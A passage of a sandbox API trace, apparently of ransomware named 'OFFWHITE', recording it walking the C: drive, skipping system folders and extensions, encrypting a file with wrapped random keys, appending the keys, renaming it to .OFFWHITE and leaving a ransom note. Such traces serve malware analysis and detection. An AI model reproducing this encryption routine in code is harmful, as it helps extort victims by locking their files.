lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0087.995] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0087.996] GetProcessHeap () returned 0x500000 [0087.996] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547db8 [0087.996] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.997] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=8723) returned 1 [0087.997] GetProcessHeap () returned 0x500000 [0087.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.997] GetProcessHeap () returned 0x500000 [0087.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.997] GetProcessHeap () returned 0x500000 [0087.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.997] GetProcessHeap () returned 0x500000 [0087.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.997] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.997] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.997] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.997] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.997] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.997] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.998] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.998] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.998] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.998] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.998] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.998] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.998] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2213, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.998] SetLastError (dwErrCode=0x0) [0087.998] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0088.001] GetLastError () returned 0x0 [0088.001] GetLastError () returned 0x0 [0088.001] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2313, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.001] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0088.001] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2413, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.001] WriteFile (in: hFile=0x21c, lpBuffer=0x547db8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547db8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0088.001] GetProcessHeap () returned 0x500000 [0088.001] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2213) returned 0x5557b0 [0088.001] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.001] ReadFile (in: hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x2213, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x2213, lpOverlapped=0x0) returned 1 [0088.003] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.003] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x2213, lpOverlapped=0x0) returned 1 [0088.003] GetProcessHeap () returned 0x500000 [0088.003] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0088.003] CloseHandle (hObject=0x21c) returned 1 [0088.004] GetProcessHeap () returned 0x500000 [0088.004] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0088.004] GetProcessHeap () returned 0x500000 [0088.004] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0088.004] GetProcessHeap () returned 0x500000 [0088.004] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0088.004] GetProcessHeap () returned 0x500000 [0088.004] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0088.005] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" [0088.005] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.OFFWHITE" [0088.005] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.offwhite")) returned 1 [0088.005] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 0 [0088.005] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0088.006] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0088.006] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0088.006] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc5a9f080, dwReserved1=0x86e42fb4, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 0 [0088.006] FindClose (in: hFindFile=0x5446d0 | out: hFindFile=0x5446d0) returned 1 [0088.006] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9170a10, ftCreationTime.dwHighDateTime=0x1d62251, ftLastAccessTime.dwLowDateTime=0xc9170a10, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xc9170a10, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OFFWHITE-MANUAL.txt", cAlternateFileName="OFFWHI~1.TXT")) returned 1 [0088.006] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2=".") returned 1 [0088.006] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2="..") returned 1 [0088.006] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2="...") returned 1 [0088.006] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2="windows") returned -1 [0088.006] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2="$recycle.bin") returned 1 [0088.006] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2="rsa") returned -1 [0088.006] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2="ntuser.dat") returned 1 [0088.006] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2="programdata") returned -1 [0088.006] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2="appdata") returned 1 [0088.006] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2="program files") returned -1 [0088.006] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2="program files (x86)") returned -1 [0088.006] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0088.007] lstrcatW (in: lpString1="C:/", lpString2="OFFWHITE-MANUAL.txt" | out: lpString1="C:/OFFWHITE-MANUAL.txt") returned="C:/OFFWHITE-MANUAL.txt" [0088.007] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.007] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.007] PathFindExtensionW (pszPath="OFFWHITE-MANUAL.txt") returned=".txt" [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".log") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".cab") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".cmd") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".com") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".cpl") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".url") returned -1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".ttf") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".mp3") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".pif") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".mp4") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".OFFWHITE") returned 1 [0088.007] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0088.007] lstrcmpiW (lpString1="OFFWHITE-MANUAL.txt", lpString2="OFFWHITE-MANUAL.txt") returned 0 [0088.007] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0088.007] lstrcmpiW (lpString1="pagefile.sys", lpString2=".") returned 1 [0088.007] lstrcmpiW (lpString1="pagefile.sys", lpString2="..") returned 1 [0088.007] lstrcmpiW (lpString1="pagefile.sys", lpString2="...") returned 1 [0088.007] lstrcmpiW (lpString1="pagefile.sys", lpString2="windows") returned -1 [0088.007] lstrcmpiW (lpString1="pagefile.sys", lpString2="$recycle.bin") returned 1 [0088.008] lstrcmpiW (lpString1="pagefile.sys", lpString2="rsa") returned -1 [0088.008] lstrcmpiW (lpString1="pagefile.sys", lpString2="ntuser.dat") returned 1 [0088.008] lstrcmpiW (lpString1="pagefile.sys", lpString2="programdata") returned -1 [0088.008] lstrcmpiW (lpString1="pagefile.sys", lpString2="appdata") returned 1 [0088.008] lstrcmpiW (lpString1="pagefile.sys", lpString2="program files") returned -1 [0088.008] lstrcmpiW (lpString1="pagefile.sys", lpString2="program files (x86)") returned -1 [0088.008] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0088.008] lstrcatW (in: lpString1="C:/", lpString2="pagefile.sys" | out: lpString1="C:/pagefile.sys") returned="C:/pagefile.sys" [0088.008] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.008] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.008] PathFindExtensionW (pszPath="pagefile.sys") returned=".sys" [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".exe") returned 1 [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".log") returned 1 [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".cab") returned 1 [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".cmd") returned 1 [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".com") returned 1 [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".cpl") returned 1 [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".ini") returned 1 [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".dll") returned 1 [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".url") returned -1 [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".ttf") returned -1 [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".mp3") returned 1 [0088.008] lstrcmpiW (lpString1=".sys", lpString2=".pif") returned 1 [0088.009] lstrcmpiW (lpString1=".sys", lpString2=".mp4") returned 1 [0088.009] lstrcmpiW (lpString1=".sys", lpString2=".OFFWHITE") returned 1 [0088.009] lstrcmpiW (lpString1=".sys", lpString2=".msi") returned 1 [0088.009] lstrcmpiW (lpString1="pagefile.sys", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0088.009] GetProcessHeap () returned 0x500000 [0088.009] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547dc8 [0088.009] CreateFileW (lpFileName="C:/pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.009] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295f8e0 | out: lpFileSize=0x295f8e0*=-4251584188) returned 0 [0088.009] GetProcessHeap () returned 0x500000 [0088.009] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0088.009] GetProcessHeap () returned 0x500000 [0088.009] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0088.009] GetProcessHeap () returned 0x500000 [0088.009] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0088.009] GetProcessHeap () returned 0x500000 [0088.010] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0088.010] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.010] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.010] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0088.010] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.010] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.010] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0088.010] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.010] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.010] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295f690*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295f690*=0x100) returned 1 [0088.010] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.010] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.010] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295f68c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295f68c*=0x100) returned 1 [0088.011] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295f944, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0088.011] SetLastError (dwErrCode=0x0) [0088.011] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5241a8, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295f8cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295f8cc, lpOverlapped=0x0) returned 0 [0088.011] GetLastError () returned 0x6 [0088.011] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0088.011] lstrcmpiW (lpString1="PerfLogs", lpString2=".") returned 1 [0088.011] lstrcmpiW (lpString1="PerfLogs", lpString2="..") returned 1 [0088.011] lstrcmpiW (lpString1="PerfLogs", lpString2="...") returned 1 [0088.011] lstrcmpiW (lpString1="PerfLogs", lpString2="windows") returned -1 [0088.011] lstrcmpiW (lpString1="PerfLogs", lpString2="$recycle.bin") returned 1 [0088.011] lstrcmpiW (lpString1="PerfLogs", lpString2="rsa") returned -1 [0088.011] lstrcmpiW (lpString1="PerfLogs", lpString2="ntuser.dat") returned 1 [0088.011] lstrcmpiW (lpString1="PerfLogs", lpString2="programdata") returned -1 [0088.011] lstrcmpiW (lpString1="PerfLogs", lpString2="appdata") returned 1 [0088.011] lstrcmpiW (lpString1="PerfLogs", lpString2="program files") returned -1 [0088.011] lstrcmpiW (lpString1="PerfLogs", lpString2="program files (x86)") returned -1 [0088.011] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0088.011] lstrcatW (in: lpString1="C:/", lpString2="PerfLogs" | out: lpString1="C:/PerfLogs") returned="C:/PerfLogs" [0088.011] lstrcatW (in: lpString1="C:/PerfLogs", lpString2="\\" | out: lpString1="C:/PerfLogs\\") returned="C:/PerfLogs\\" [0088.011] lstrcpyW (in: lpString1=0x295f6f0, lpString2="C:/PerfLogs\\" | out: lpString1="C:/PerfLogs\\") returned="C:/PerfLogs\\" [0088.011] lstrcatW (in: lpString1="C:/PerfLogs\\", lpString2="*.*" | out: lpString1="C:/PerfLogs\\*.*") returned="C:/PerfLogs\\*.*" [0088.011] FindFirstFileW (in: lpFileName="C:/PerfLogs\\*.*", lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, dwReserved1=0xdd354335, cFileName=".", cAlternateFileName="")) returned 0x5446d0 [0088.012] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0088.012] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, dwReserved1=0xdd354335, cFileName="..", cAlternateFileName="")) returned 1 [0088.012] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0088.012] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0088.012] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, dwReserved1=0xdd354335, cFileName="Admin", cAlternateFileName="")) returned 1 [0088.012] lstrcmpiW (lpString1="Admin", lpString2=".") returned 1 [0088.012] lstrcmpiW (lpString1="Admin", lpString2="..") returned 1 [0088.012] lstrcmpiW (lpString1="Admin", lpString2="...") returned 1 [0088.012] lstrcmpiW (lpString1="Admin", lpString2="windows") returned -1 [0088.012] lstrcmpiW (lpString1="Admin", lpString2="$recycle.bin") returned 1 [0088.013] lstrcmpiW (lpString1="Admin", lpString2="rsa") returned -1 [0088.013] lstrcmpiW (lpString1="Admin", lpString2="ntuser.dat") returned -1 [0088.013] lstrcmpiW (lpString1="Admin", lpString2="programdata") returned -1 [0088.013] lstrcmpiW (lpString1="Admin", lpString2="appdata") returned -1 [0088.013] lstrcmpiW (lpString1="Admin", lpString2="program files") returned -1 [0088.013] lstrcmpiW (lpString1="Admin", lpString2="program files (x86)") returned -1 [0088.013] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/PerfLogs\\" | out: lpString1="C:/PerfLogs\\") returned="C:/PerfLogs\\" [0088.013] lstrcatW (in: lpString1="C:/PerfLogs\\", lpString2="Admin" | out: lpString1="C:/PerfLogs\\Admin") returned="C:/PerfLogs\\Admin" [0088.013] lstrcatW (in: lpString1="C:/PerfLogs\\Admin", lpString2="\\" | out: lpString1="C:/PerfLogs\\Admin\\") returned="C:/PerfLogs\\Admin\\" [0088.013] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/PerfLogs\\Admin\\" | out: lpString1="C:/PerfLogs\\Admin\\") returned="C:/PerfLogs\\Admin\\" [0088.013] lstrcatW (in: lpString1="C:/PerfLogs\\Admin\\", lpString2="*.*" | out: lpString1="C:/PerfLogs\\Admin\\*.*") returned="C:/PerfLogs\\Admin\\*.*" [0088.013] FindFirstFileW (in: lpFileName="C:/PerfLogs\\Admin\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName=".", cAlternateFileName="")) returned 0x544690 [0088.013] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0088.013] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="..", cAlternateFileName="")) returned 1 [0088.013] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0088.013] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0088.013] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="..", cAlternateFileName="")) returned 0 [0088.014] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0088.014] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, 